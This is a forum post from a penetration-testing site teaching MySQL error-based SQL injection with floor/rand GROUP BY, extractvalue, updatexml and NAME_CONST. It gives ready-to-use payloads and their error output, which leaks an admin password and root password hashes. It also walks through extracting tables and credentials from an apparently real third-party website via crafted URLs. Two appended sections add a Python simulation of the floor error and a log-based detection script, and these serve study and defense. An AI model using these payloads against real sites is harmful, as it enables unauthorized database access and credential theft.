China Network Penetration Testing Alliance

Title: MySQL error-based injection: three techniques using floor, ExtractValue and UpdateXml

Author: admin    Time: 2015-11-11 19:03

1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To retrieve other data, replace the version() expression with the query you need.
For example, to retrieve the administrator username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
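Why the floor(rand(0)*2) GROUP BY payload above ends in a duplicate-key error, as an added example (not part of the original post): it reimplements MySQL's RAND(seed) generator from its public definition and models the usual explanation of GROUP BY over a temporary table (the key is evaluated to look a group up, then evaluated again when the group is inserted). The first six values of floor(rand(0)*2) are 0,1,1,0,1,1, which is also why the source needs at least three rows; the key prefix is taken from the error shown above.

```python
# Added example (not from the original post): why the floor(rand(0)*2) GROUP BY
# payload ends in "ERROR 1062 Duplicate entry ... for key 'group_key'".
# mysql_rand() follows the public definition of MySQL's RAND(seed) generator;
# simulate_group_by() models the usual explanation of GROUP BY over a temporary
# table: the key is evaluated to look a group up, then again when inserting it.

MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's my_rnd()

def mysql_rand(seed):
    """Yield the float sequence MySQL's RAND(seed) produces for an integer seed."""
    seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
    seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE

def floor_rand0_bits(n):
    """First n values of floor(rand(0)*2), the digit appended to the group key."""
    gen = mysql_rand(0)
    return [int(next(gen) * 2) for _ in range(n)]

def simulate_group_by(row_count, prefix="5.1.33-community-log"):
    """Model: select count(*),concat(prefix,floor(rand(0)*2)) x ... group by x.

    Each source row evaluates the key once to look its group up; if the group
    is new, the key is evaluated AGAIN for the inserted row. Every evaluation
    advances rand(0), so the inserted key may differ from the looked-up key and
    collide with a group inserted earlier. Returns ("ok", groups) or
    ("error", duplicate_key), the latter being MySQL's ERROR 1062.
    """
    gen = mysql_rand(0)
    groups = {}
    for _ in range(row_count):
        lookup_key = prefix + str(int(next(gen) * 2))
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        insert_key = prefix + str(int(next(gen) * 2))  # second evaluation
        if insert_key in groups:
            return ("error", insert_key)
        groups[insert_key] = 1
    return ("ok", groups)

if __name__ == "__main__":
    print(floor_rand0_bits(8))   # [0, 1, 1, 0, 1, 1, 0, 0]
    print(simulate_group_by(2))  # two source rows: no collision
    print(simulate_group_by(3))  # third row reinserts '...log1' -> error
```

With only two source rows the second row simply joins the group created by the first, which is why information_schema.tables or a three-row UNION is used as the row source.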

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
! [) V: D* |9 h! r6 m$ }  M% m7 ]# {  H' ~7 R, [1 s
Error-based injection on newer MySQL versions: exploiting with NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There are not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.
( _7 A+ i! r4 Y2 q4 \: v3 u( O+ n* ]0 X9 r; E$ f
MySQL 5.1.3 Server System Variables

Let's try it out on my site...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...
( N9 I5 C6 W0 J3 l9 o. n
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--


We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1

Now let's get the tables out of this bitch...

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table...

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
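Detection logic for the four error-based shapes shown on this page (floor/GROUP BY, extractvalue, updatexml and the paired NAME_CONST construction), as an added example that is not part of the original post or of any tool it mentions: it flags requests whose URL-decoded query carries one of those shapes, and separately checks whether a raw MySQL error string reached the client, which is the condition every technique here depends on. The access-log lines, client IP and path are constructed for the demo.

```python
# Added example (not from the original post): request-side and response-side
# detection for the four error-based shapes shown on this page. Log lines,
# client IP and path are constructed for the demo.
import re
from urllib.parse import unquote_plus

# One signature per technique, applied to the URL-decoded request target.
SIGNATURES = {
    "floor_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(.*?\)\s*\*\s*2\s*\).*?group\s+by", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    # two NAME_CONST() calls on the same constant -> "Duplicate column name"
    "name_const_dup": re.compile(
        r"name_const\s*\(.*?,\s*1\s*\)\s*,\s*name_const\s*\(", re.I | re.S),
}
# Error strings from this page: if one appears in a response body, the raw
# database error reached the client, which every technique here depends on.
LEAK_MARKERS = re.compile(r"Duplicate entry '.*?' for key 'group_key'"
                          r"|XPATH syntax error: '|Duplicate column name '", re.I)
REQUEST_TARGET = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def classify(log_line):
    """Names of the techniques found in one combined-format access-log line."""
    m = REQUEST_TARGET.search(log_line)
    if not m:
        return []
    target = unquote_plus(m.group(1))  # '+' and %xx become real characters
    return [name for name, rx in SIGNATURES.items() if rx.search(target)]

def scan(lines):
    """Map each flagged log line to its technique names; clean lines are dropped."""
    results = ((line, classify(line)) for line in lines)
    return {line: found for line, found in results if found}

def leaked_db_error(response_body):
    """True when a raw MySQL error string is present in what the client received."""
    return LEAK_MARKERS.search(response_body) is not None

SAMPLE_LOG = [  # constructed; 203.0.113.0/24 is a documentation address range
    '203.0.113.5 - - [11/Nov/2015:19:03:01 +0800] "GET /content/detail.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Nov/2015:19:03:02 +0800] "GET /content/detail.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 231',
    '203.0.113.5 - - [11/Nov/2015:19:03:03 +0800] "GET /content/detail.php?id=1+and+extractvalue(1,concat(0x5c,version())) HTTP/1.1" 500 198',
    '203.0.113.5 - - [11/Nov/2015:19:03:04 +0800] "GET /content/detail.php?id=1+and+1=(updatexml(1,concat(0x3a,version()),1)) HTTP/1.1" 500 198',
    '203.0.113.5 - - [11/Nov/2015:19:03:05 +0800] "GET /content/detail.php?id=1+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 187',
]

if __name__ == "__main__":
    for line, found in scan(SAMPLE_LOG).items():
        print(found, line.split('"')[1])
```

The request-side signatures are a starting point for a WAF or SIEM rule; the response-side check is the one that removes the root cause, since an application that returns a generic error page instead of the database error gives none of these techniques anything to read.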
Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2